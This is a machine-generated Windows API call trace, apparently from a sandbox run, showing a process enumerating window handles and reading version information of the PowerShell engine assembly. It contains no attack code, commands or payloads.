	[0377.995] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x250
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x240
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x790
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x61c
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x540
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x538
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x568
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x538
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x568
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x538
	[0377.995] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x540
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x540
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x57c
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x554
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x528
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x79c
	[0377.996] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4e0
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x44c
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x778
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x558
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.997] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1218
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1214
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x11ec
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x11e8
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x11cc
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1140
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe6c
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x6e8
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc6c
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf94
	[0377.998] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xffc
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf74
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf08
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf0c
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xed8
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe90
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xea8
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfa8
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfbc
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfb8
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfb4
	[0377.999] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfb0
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfac
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfc0
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xfd0
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf88
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf84
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf80
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xde0
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xddc
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xdd8
	[0378.000] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xd34
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xd10
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xd0c
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc9c
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc74
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc1c
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc08
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xabc
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x24c
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xbb0
	[0378.001] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xbfc
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb10
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x374
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x368
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb28
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xae8
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb14
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x95c
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa8c
	[0378.002] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x46c
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb3c
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa90
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xad0
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa9c
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xaa0
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb1c
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x7e0
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa74
	[0378.003] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x694
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa28
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x9b0
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x8d8
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x940
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x93c
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4ec
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x150
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x720
	[0378.004] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x3c4
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x7d4
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x6c8
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb54
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb54
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb5c
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x838
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x818
	[0378.005] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x5b8
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x494
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1ec
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x440
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x7e8
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x730
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x2c8
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x31c
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x330
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x128
	[0378.006] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x5c8
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x6f8
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x358
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x73c
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb0
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x250
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x240
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x790
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x61c
	[0378.007] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x568
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x538
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x540
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x79c
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4e0
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0378.008] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x778
	[0378.012] WerSetFlags () returned 0x0
	[0378.531] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0378.531] CoTaskMemFree (pv=0x0) 
	[0378.532] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dda8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dda0 | out: pulNumLanguages=0x26dda8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dda0) returned 1
	[0378.533] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dda8, pwszLanguagesBuffer=0x2ea2920, pcchLanguagesBuffer=0x26dda0 | out: pulNumLanguages=0x26dda8, pwszLanguagesBuffer=0x2ea2920, pcchLanguagesBuffer=0x26dda0) returned 1
	[0378.537] CoTaskMemAlloc (cb=0x24) returned 0x474910
	[0378.537] GetUserDefaultLocaleName (in: lpLocaleName=0x474910, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0378.537] CoTaskMemFree (pv=0x474910) 
	[0378.557] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0378.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0378.558] CoTaskMemFree (pv=0x46a6b0) 
	[0378.559] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0378.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0378.559] CoTaskMemFree (pv=0x46a6b0) 
	[0378.561] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0378.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0378.561] CoTaskMemFree (pv=0x46a6b0) 
	[0379.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.029] SetErrorMode (uMode=0x1) returned 0x1
	[0379.029] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26da20 | out: lpFileInformation=0x26da20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0379.029] SetErrorMode (uMode=0x1) returned 0x1
	[0379.029] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dc90 | out: lpdwHandle=0x26dc90) returned 0x94c
	[0379.030] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ea61b0 | out: lpData=0x2ea61b0) returned 1
	[0379.031] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dc08, puLen=0x26dc00 | out: lplpBuffer=0x26dc08*=0x2ea624c, puLen=0x26dc00) returned 1
	[0379.031] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea6328, puLen=0x26db70) returned 1
	[0379.031] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0379.031] CoTaskMemAlloc (cb=0x2e) returned 0x4720f0
	[0379.031] lstrcpyW (in: lpString1=0x4720f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0379.031] CoTaskMemFree (pv=0x4720f0) 
	[0379.031] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea637c, puLen=0x26db70) returned 1
	[0379.031] lstrlenW (lpString="System.Management.Automation") returned 28
	[0379.031] CoTaskMemAlloc (cb=0x3c) returned 0x3b9900
	[0379.031] lstrcpyW (in: lpString1=0x3b9900, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0379.031] CoTaskMemFree (pv=0x3b9900) 
	[0379.031] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea63d8, puLen=0x26db70) returned 1
	[0379.031] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0379.031] CoTaskMemAlloc (cb=0x20) returned 0x474970
	[0379.031] lstrcpyW (in: lpString1=0x474970, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0379.031] CoTaskMemFree (pv=0x474970) 
	[0379.031] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea6418, puLen=0x26db70) returned 1
	[0379.031] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0379.031] CoTaskMemAlloc (cb=0x44) returned 0x3b9900
	[0379.031] lstrcpyW (in: lpString1=0x3b9900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0379.031] CoTaskMemFree (pv=0x3b9900) 
	[0379.031] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea6480, puLen=0x26db70) returned 1
	[0379.032] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0379.032] CoTaskMemAlloc (cb=0x76) returned 0x425050
	[0379.032] lstrcpyW (in: lpString1=0x425050, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0379.032] CoTaskMemFree (pv=0x425050) 
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea651c, puLen=0x26db70) returned 1
	[0379.032] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0379.032] CoTaskMemAlloc (cb=0x44) returned 0x3b9900
	[0379.032] lstrcpyW (in: lpString1=0x3b9900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0379.032] CoTaskMemFree (pv=0x3b9900) 
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea6580, puLen=0x26db70) returned 1
	[0379.032] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0379.032] CoTaskMemAlloc (cb=0x58) returned 0x442060
	[0379.032] lstrcpyW (in: lpString1=0x442060, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0379.032] CoTaskMemFree (pv=0x442060) 
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea65fc, puLen=0x26db70) returned 1
	[0379.032] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0379.032] CoTaskMemAlloc (cb=0x20) returned 0x474970
	[0379.032] lstrcpyW (in: lpString1=0x474970, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0379.032] CoTaskMemFree (pv=0x474970) 
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x2ea62a4, puLen=0x26db70) returned 1
	[0379.032] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
